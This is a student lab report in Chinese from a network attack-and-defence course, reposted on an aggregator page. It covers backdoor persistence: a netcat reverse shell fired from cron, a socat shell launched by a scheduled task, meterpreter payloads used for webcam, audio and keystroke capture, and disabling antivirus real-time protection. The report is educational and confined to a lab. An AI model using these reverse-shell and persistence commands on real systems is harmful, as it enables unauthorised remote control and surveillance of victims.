当前位置: 首页 > news >正文

20232410 2025-2026-1 《网络与系统攻防技术》实验二实验报告

20232410  2025-2026-1 《网络与系统攻防技术》实验二实验报告
一、实验内容
image

回答问题:
(1)例举你能想到的一个后门进入到你系统中的可能方式?
比如某些钓鱼邮件或者钓鱼网站,携带着一些捆绑着后门程序的exe文件。若点击运行就有可能被植入后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows:通过schtasks命令创建定时任务,指定后门在特定时间自动执行。
Linux:通过某些工具将后门代码注入到系统常驻进程中,借助合法进程的启动来激活。
(3)Meterpreter有哪些给你映像深刻的功能?
可以远程控制摄像头拍照并且记录电脑音频,让我措不及防。
(4)如何发现自己有系统有没有被安装后门? 
可以通过任务管理器查看 CPU 占用异常的进程或者使用杀毒软件扫描。
二、实验过程
2.1 使用netcat获取主机操作Shell,cron启动任务
在Windows中运行nc开始监听2410端口
image

监听状态
image

kali反弹连接Windows,提供自己的shell
image

连接成功,主机获得虚拟机的shell
image

使用cron定时启动任务,在cron表的末尾添加命令50 * * * * /bin/netcat 172.20.10.3 2410 -e /bin/sh,使得在每小时的50分时都交出本机的shell控制权。
image
image

在50分后,主机得到控制权
image

2.2 使用socat获取主机操作Shell,任务计划启动
在Windows下,打开:控制面板->管理工具->任务计划程序,新建任务计划。选择启动的程序为socat.exe,输入参数 tcp-listen:2410 exec:cmd.exe,pty,stderr,任务调整为锁屏后启动,kali终端启动监听。结果如下
image

2.3 使用MSF meterpreter生成可执行文件(后门),传送到主机并运行获取主机Shell
Meterpreter是Metasploit框架中一款功能强大的后渗透攻击载荷,它支持文件操作、屏幕截图、键盘记录等功能。
image

将后门文件传给本机,这里使用了共享文件。先挂载共享文件夹,创建挂载点,再传输文件
image
image

进入msf控制台进行配置
image
image

得到了shell
image

2.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

继续调用指令,继续录音拍照等操作
image

调用摄像头权限如图:
image

尝试提权
image

2.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取到反弹连接Shell
使用命令生成以pwn20232410a为模板的shellcode文件20232410_pwn
image

输入指令msfconsole,进入msf命令行,操作同上,然后运行文件
image

得出结果
image

三、问题及解决
1.在获取摄像头权限时,系统安全中心预警,强制删除了后门文件。
解决:关闭系统安全中心的实时保护:
image

并且实时保护一段时间后会自动开启,需要小心。

2.后门文件在使用ncat传输到主机上时无法打开,且发现文件大小与原文件不一致。
解决:使用共享文件的方法。创建一个主机与kali之间共享的文件,通过这个文件来传输
image

3.在执行exploit指令时出现错误:
image

显示session1关闭。
解决:参考了毕同学的方法
image

四、心得体会

这次有关后门原理与实践的实验让我对后门的攻击操作有了更深刻的认识。我初步了解了netcat,socat与MSF meterpreter的原理与实际操作。整个实验过程中我也遇到了许多问题,包括防火墙调整,权限控制,传输工具选择与版本兼容。但在同学的经验总结与帮助下都得到了总结,让我受益颇多。

http://www.jsqmd.com/news/17809/

相关文章:

  • SQLite简单使用
  • apache服务配置
  • 心理咨询系统
  • Adaptive Learning Rate(自适应学习率) - -一叶知秋
  • 新学期每日总结(第12天)
  • 17 线程的创建
  • 2025.10.20总结 - A
  • 一般公共预算收入 + 全国政府性基金收入
  • 从C10K到Reactor:事件驱动,如何重塑高并发服务器的网络架构
  • AI助力可再生能源系统优化研究
  • 结对项目:小学四则运算题目生成器
  • 数据范围
  • CF2107E Ain and Apple Tree
  • P14262 [ROI 2015 Day1] 自动好友
  • 傻瓜式处理kauditd0病毒程序记录
  • win10 升级 win11 后时间更新失败
  • 软件工程学习日志2025.10.20
  • P14254 分割(树上计数问题) 题解
  • 完整教程:开源 C++ QT QML 开发(一)基本介绍
  • 102302104刘璇综合实践作业任务一:智能购物平台用户需求调研分析报告——基于195份问卷的用户痛点挖掘
  • 软件工程第二次团队作业
  • Hands on Deep Learning Chapter 3 线性神经网络
  • 超越技术范畴:低代码如何重塑企业数字文化
  • 好用的网址
  • 【C++实战(71)】解锁C++音视频编写:FFmpeg从入门到实战
  • 20251020
  • 低代码赋能业务创新:打破数字鸿沟,释放业务潜能
  • 【大模型】大模型训练的几个不同阶段
  • 详细介绍:1、手把手教你入门设计半桥LLC开关电源设计,LLC谐振腔器件计算
  • 十六天